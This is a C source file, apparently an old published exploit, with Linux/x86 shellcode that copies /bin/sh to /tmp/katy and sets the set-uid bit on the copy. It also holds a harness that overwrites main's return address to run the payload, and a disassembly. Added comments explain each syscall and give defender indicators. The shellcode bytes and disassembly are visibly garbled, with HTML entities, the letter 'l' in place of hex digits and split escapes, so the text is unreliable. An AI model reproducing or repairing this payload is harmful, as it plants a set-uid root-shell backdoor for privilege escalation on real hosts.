
/* 

* Linux/x86 

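* /bin/cp /bin/sh /tmp/katy ; chmod 4555 /tmp/sh using fork() 
* (the chmod in the code below is applied to /tmp/katy, the destination of
*  the copy; "/tmp/sh" above does not match the embedded string)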
*/ 

#include &quot ; stdio . h&quot ; 


/*
 * Linux/x86 (32-bit, int $0x80) payload stored as a C string.  The summary
 * below is read from the disassembly in the comment at the end of this
 * file, not decoded from these bytes:
 *
 *   - a jmp/call/popl sequence leaves the address of the trailing string
 *     "/bin/cp8/bin/sh8/tmp/katy" in %edi;
 *   - zero bytes are stored at offsets 0x7 and 0xf (the two '8'
 *     placeholders) and at 0x19 (just past "/tmp/katy"), turning the one
 *     string into three NUL-terminated strings.  The '8' placeholders keep
 *     the literal free of NUL bytes, so strlen() in main() sees the whole
 *     payload;
 *   - a pointer table { "/bin/cp", "/bin/sh", "/tmp/katy", 0 } is built at
 *     offsets 0x1a..0x26;
 *   - syscall 0x2 (fork on i386).  On a zero return, syscall 0xb (execve)
 *     runs /bin/cp with that table as argv.  On a non-zero return the code
 *     issues syscall 0x7 (waitpid, pid -1), then syscall 0xf (chmod) on
 *     /tmp/katy with mode 0x96d (octal 04555: set-uid plus r-xr-xr-x),
 *     then syscall 0x1 (exit) with status 0.
 *
 * Defender's view: the end state is a set-uid copy of /bin/sh in /tmp,
 * owned by whichever user the process that ran the payload was running as.
 * Mounting /tmp with nosuid removes the effect of the set-uid bit.  A
 * set-uid regular file appearing in a world-writable directory, or a
 * chmod() that sets the set-uid bit there, is the host-side indicator to
 * alert on.
 *
 * NOTE(review): as printed here the initializer is extraction-damaged and
 * will not compile: the quotes appear as HTML entities, several escapes
 * contain the letter 'l' where a hex digit belongs, and some escapes are
 * split by spaces.
 */
char shellcode[] = 

&quot ; \xeb\x5e\x5f \x31\xc0\x88\x47\x07\x88\x47\x0f \x88\x47\xl9\x89\x7f&quot ; 
&quot ; \xla\x8d\x77\x08\x89\x77\xle\x31\xf 6\x8d\x77\xl0\x89\x77\x22\x89&quot ; 
&quot ; \x47\x26\x89\xf b\x8d\x4f \xla\x8d\x57\x26\x31\xc0\xb0\x02\xcd\x80&quot ; 
&quot ; \x31\xf 6\x39\xc6\x75\x06\xb0\x0b\xcd\x80\xeb\xld\x31\xd2\x31\xc0&quot ; 
&quot ; \x31\xdb\x4b\x8d\x4f \x26\xb0\x07\xcd\x80\x31\xc0\x8d\x5f \xl0\x31&quot ; 
&quot ; \xc9\x66\xb9\x6d\x09\xb0\x0f \xcd\x80\x31\xc0\x40\x31\xdb\xcd\x80&quot ; 
&quot ; \xe8\x9d\xf f \xf f \xf f /bin/cp8/bin/sh8/tmp/katy&quot ; ; 

/*
 * Test harness: prints the payload length, then stores the address of
 * shellcode[] into the stack slot two ints above the local `ret`, so that
 * control moves to the payload when main() returns.
 *
 * NOTE(review): the "+2" presumably targets main's saved return address
 * under the frame layout the author's compiler produced; nothing in this
 * file guarantees that layout, and writing outside `ret` is undefined
 * behaviour.  Confirm against the actual build before relying on it.
 *
 * Why this is fragile, and what stops it on a hardened build:
 *   - the (int) cast of a pointer truncates the address wherever pointers
 *     are wider than int (e.g. LP64);
 *   - shellcode[] is an ordinary data object, so a non-executable data
 *     mapping (NX / W^X) faults on the first payload instruction;
 *   - a stack protector or a different frame layout moves or guards the
 *     slot that "+2" is meant to hit.
 *
 * Other review points, left unchanged here:
 *   - main() has no declared return type (implicit int);
 *   - strlen() is called but only stdio.h is included, so it has no
 *     prototype in scope;
 *   - "%d" is given strlen()'s result, which is a size_t, not an int.
 */
main() { 

int *ret; 

/* Point `ret` two int-sized slots above its own address on the stack. */
ret=(int *)&amp;ret +2; 

/* strlen() stops at the first NUL byte in the array. */
printf (&quot ;Shellcode lenght=%d\n&quot ; , strlen(shellcode) ) ; 

/* Overwrite that slot with the payload's address (truncated to int). */
(*ret) = (int)shellcode; 

} 


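/* Code: AT&T-syntax disassembly of the shellcode[] bytes above.  Jump and
   call operands are printed as relative displacements.  Hex constants that
   contain the letter 'l' are extraction damage, not valid operands. */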
/* 


asm (&quot ; 


jmp 0x5e 
popl %edi 
xorl %eax,%eax 
movb %al, 0x7(%edi) 
movb %al, 0xf (%edi) 

movb %al, 0xl9(%edi) 
movl %edi, 0xla(%edi) 
leal 0x8(%edi),%esi 
movl %esi, 0xle(%edi) 
xorl %esi,%esi 
leal 0xl0(%edi),%esi 
movl %esi, 0x22(%edi) 
movl %eax, 0x26(%edi) 
movl %edi,%ebx 
leal 0xla(%edi) ,%ecx 
leal 0x26(%edi),%edx 
xorl %eax,%eax 
movb $0x2, %al 

int $0x80 

xorl %esi,%esi 
cmpl %eax,%esi 
jne 0x6 

movb $0xb,%al 

int $0x80 



jmp 0xld 
xorl %edx,%edx 
xorl %eax,%eax 
xorl %ebx,%ebx 
dec %ebx 

leal 0x26(%edi),%ecx 
movb $0x7, %al 

int $0x80 

xorl %eax,%eax 
leal 0xl0(%edi),%ebx 
xorl %ecx,%ecx 
movw $0x96d, %cx 
movb $0xf,%al 

int $0x80 

xorl %eax,%eax 
inc %eax 

xorl %ebx,%ebx 
int $0x80 

call -0x63 

. ascii \&quot ; /bin/cp8/bin/sh8/tmp/katy\&quot ; 

&quot ; ) ; 

*/ 